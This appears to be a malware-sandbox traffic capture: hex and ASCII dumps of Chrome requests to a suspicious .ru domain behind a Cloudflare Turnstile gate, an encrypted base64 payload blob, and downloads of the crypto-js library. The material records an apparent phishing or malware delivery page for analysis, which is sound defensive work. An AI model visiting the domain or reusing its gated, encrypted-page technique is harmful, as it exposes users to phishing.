                                      2024-09-13 13:16:17 UTC859OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 4b 4a 78 63 49 4a 31 7a 33 58 7a 4f 4a 62 77 38 78 54 6b 34 6c 6d 33 61 45 70 45 58 41 4b 59 6f 64 4d 44 78 44 77 56 31 67 59 56 44 73 59 75 69 63 48 61 56 31 53 63 5a 78 30 43 6e 41 34 75 78 36 6c 73 4d 5a 57 63 47 72 68 6f 76 2d 36 42 46 48 41 70 77 51 6c 76 65 59 70 37 57 37 59 5a 59 69 70 31 70 2d 76 38 69 48 31 61 49 70 54 32 33 73 55 75 5f 46 51 6f 6f 52 6a 77 66 67 56 79 74 37 74 59 33 53 38 64 44 52 47 43 76 75 63 56 51 51 59 53 6d 79 6a 4e 77 69 68 73 32 4a 4b 55 38 36 50 4e 61 56 71 66 4d 56 36 59 35 34 53 75 7a 6a 62 37 74 63 76 47 67 5f 45 55 70 55 4f 65 72 49 39 30 2d 6d 49 6c 34 6c 57 74 6b 55 45 39 73 65 52 43 67 49 6a 4c 63 4f 5a 55 56 55 63 43 71 2d 58 56 72 7a 53 44
                                      Data Ascii: cf-turnstile-response=0.KJxcIJ1z3XzOJbw8xTk4lm3aEpEXAKYodMDxDwV1gYVDsYuicHaV1ScZx0CnA4ux6lsMZWcGrhov-6BFHApwQlveYp7W7YZYip1p-v8iH1aIpT23sUu_FQooRjwfgVyt7tY3S8dDRGCvucVQQYSmyjNwihs2JKU86PNaVqfMV6Y54Suzjb7tcvGg_EUpUOerI90-mIl4lWtkUE9seRCgIjLcOZUVUcCq-XVrzSD
                                      2024-09-13 13:16:18 UTC777INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:16:18 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.3.33
                                      access-control-allow-origin: *
                                      expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      cache-control: no-store, no-cache, must-revalidate
                                      pragma: no-cache
                                      vary: Accept-Encoding
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bxdbx7jJ7w6RO%2FeHA9YLVvNoJAayEZW3vyove2RHGj%2FXluMxEPXkOtlZvu%2FhWQhQrg32c%2Fuj4YwujtSkF24FU3%2B8mHDbVW%2BQ7%2Bi%2BDB85Pn2cll4OEDxamE1FoW6s721CU4U%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c286934cd0e1912-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:18 UTC592INData Raw: 31 36 64 33 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 74 79 6c
                                      Data Ascii: 16d3<html> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script> <styl
                                      2024-09-13 13:16:18 UTC1369INData Raw: 31 2e 32 25 2c 20 38 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 30 3b 7d 34 37 25 2c 20 37 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 31 3b 7d 7d 23 74 61 63 74 66 75 6c 6e 65 73 73 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 39 70 78 3b 7d 23 76 61 67 75 65 6c 79 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 37 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 20 30 20 37 70 78 20 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 34 31 70 78 3b 7d 23 76 61 67 75 65 6c 79 3e 2e 75 6c 75 6c 61 74 69 6f 6e 20 7b 77 69 64 74 68 3a 20 32 38 37 70 78 3b 68 65 69 67 68 74 3a 20 37 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 37 61 30
                                      Data Ascii: 1.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#tactfulness {width: 130px;margin-top: 179px;}#vaguely {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#vaguely>.ululation {width: 287px;height: 71px;background: #27a0
                                      2024-09-13 13:16:18 UTC1369INData Raw: 3b 7d 2e 7a 69 72 63 6f 6e 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 66 63 66 66 66 3b 7d 2e 70 61 63 69 66 69 63 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 33 35 66 62 33 3b 7d 2e 74 61 62 6c 65 77 61 72 65 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 33 34 32 37 36 3b 7d 23 77 61 69 74 70 65 72 73 6f 6e 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 70 65 6e 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 32 2c 20 30 2c 20 30 2e 36 37 2c 20 30 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 74 6f
                                      Data Ascii: ;}.zircon {background: #4fcfff;}.pacific {background: #035fb3;}.tableware {background: #134276;}#waitperson {width: 130px;height: 107px;animation: opened-flap-swing 5s infinite;animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);transform-origin: to
                                      2024-09-13 13:16:18 UTC1369INData Raw: 73 73 3d 22 68 61 67 67 6c 65 72 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 62 69 74 75 61 6c 6c 79 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 7a 65 73 74 66 75 6c 20 77 61 67 67 6c 65 22 3e 3c 2f 64 69 76 3e 20 3c 21 2d 2d 20 41 20 63 61 72 e2 80 99 73 20 63 68 61 72 61 63 74 65 72 20 73 68 69 6e 65 73 20 74 68 72 6f 75 67 68 20 77 69 74 68 20 65 76 65 72 79 20 74 75 72 6e 2e 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 7a 65 73 74 66 75 6c 20 65 61 72 6e 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 7a 65 73 74 66 75 6c 20 7a 69 72 63 6f 6e 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 62 69 74 75 61 6c 6c 79 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 7a 65
                                      Data Ascii: ss="haggler"></div><div class="habitually"><div class="zestful waggle"></div> ... A cars character shines through with every turn. --><div class="zestful earnings"></div><div class="zestful zircon"></div></div><div class="habitually"><div class="ze
                                      2024-09-13 13:16:18 UTC1152INData Raw: 70 54 4b 30 39 34 65 6c 4a 35 4d 6d 68 45 57 6c 70 42 55 54 30 69 4c 43 4a 6a 49 6a 6f 69 4d 7a 41 35 5a 44 6c 6a 4e 7a 6b 78 4d 6d 4d 30 4d 7a 46 69 4d 6a 4a 69 59 32 4d 77 4f 54 41 78 5a 6d 46 6d 4f 54 46 6b 59 32 59 69 4c 43 4a 69 49 6a 6f 69 4e 54 51 31 4e 6a 5a 68 4d 44 52 6b 4e 54 5a 6c 4f 47 51 34 5a 47 49 30 4d 6a 59 32 4d 6a 55 33 4e 54 51 35 4d 7a 49 7a 5a 54 45 30 4f 44 5a 6c 59 6a 67 35 59 6d 56 6a 5a 54 41 35 59 7a 49 32 59 7a 59 34 4e 47 51 35 5a 6a 51 30 4e 6a 41 31 4e 57 46 68 4f 57 4e 68 4d 6d 4a 6c 4d 47 5a 6b 5a 44 68 69 4e 54 64 6c 5a 6d 4a 6a 4e 7a 67 35 4e 54 51 34 4d 47 52 6c 5a 44 4d 30 4e 7a 6c 68 4e 54 67 32 4d 54 68 6a 4e 54 59 78 4f 54 4e 6b 59 57 5a 6d 4d 57 46 69 59 54 59 35 4d 6d 4d 78 5a 44 42 6d 4d 54 6b 30 4d 6a 6b 79 59
                                      Data Ascii: pTK094elJ5MmhEWlpBUT0iLCJjIjoiMzA5ZDljNzkxMmM0MzFiMjJiY2MwOTAxZmFmOTFkY2YiLCJiIjoiNTQ1NjZhMDRkNTZlOGQ4ZGI0MjY2MjU3NTQ5MzIzZTE0ODZlYjg5YmVjZTA5YzI2YzY4NGQ5ZjQ0NjA1NWFhOWNhMmJlMGZkZDhiNTdlZmJjNzg5NTQ4MGRlZDM0NzlhNTg2MThjNTYxOTNkYWZmMWFiYTY5MmMxZDBmMTk0MjkyY
                                      2024-09-13 13:16:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.449781104.17.24.144434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:19 UTC561OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                      Host: cdnjs.cloudflare.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://datamingleol.ru/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:19 UTC964INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:16:19 GMT
                                      Content-Type: application/javascript; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Access-Control-Allow-Origin: *
                                      Cache-Control: public, max-age=30672000
                                      ETag: W/"5eb03e2d-bb78"
                                      Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                      cf-cdnjs-via: cfworker/kv
                                      Cross-Origin-Resource-Policy: cross-origin
                                      Timing-Allow-Origin: *
                                      X-Content-Type-Options: nosniff
                                      CF-Cache-Status: HIT
                                      Age: 157949
                                      Expires: Wed, 03 Sep 2025 13:16:19 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRDig%2BLV2BS25espvD%2BVvRSlDs7TRnCtxo4Sgwt7D%2BgXePGh8zQsPD%2F0DREMBEOiO0We5XjOgn8kJoDMTvPcUTn3WLAOP%2BwrChro%2BiTifc4Q9vPO00mYvxWbDKX5Sb3uLQYT4DUV"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                      Strict-Transport-Security: max-age=15780000
                                      Server: cloudflare
                                      CF-RAY: 8c28693d6cee41e3-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:19 UTC405INData Raw: 33 39 37 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                      Data Ascii: 397c!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                      2024-09-13 13:16:19 UTC1369INData Raw: 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                      Data Ascii: o&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==t
                                      2024-09-13 13:16:19 UTC1369INData Raw: 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a
                                      Data Ascii: ar o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:
                                      2024-09-13 13:16:19 UTC1369INData Raw: 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f
                                      Data Ascii: arse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._do
                                      2024-09-13 13:16:19 UTC1369INData Raw: 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d
                                      Data Ascii: ,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]
                                      2024-09-13 13:16:19 UTC1369INData Raw: 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29
                                      Data Ascii: 092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)
                                      2024-09-13 13:16:19 UTC1369INData Raw: 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32
                                      Data Ascii: >>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42
                                      2024-09-13 13:16:19 UTC1369INData Raw: 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b
                                      Data Ascii: ),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[
                                      2024-09-13 13:16:19 UTC1369INData Raw: 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72
                                      Data Ascii: i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;retur
                                      2024-09-13 13:16:19 UTC1369INData Raw: 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72
                                      Data Ascii: (o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.449782104.17.24.144434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:20 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
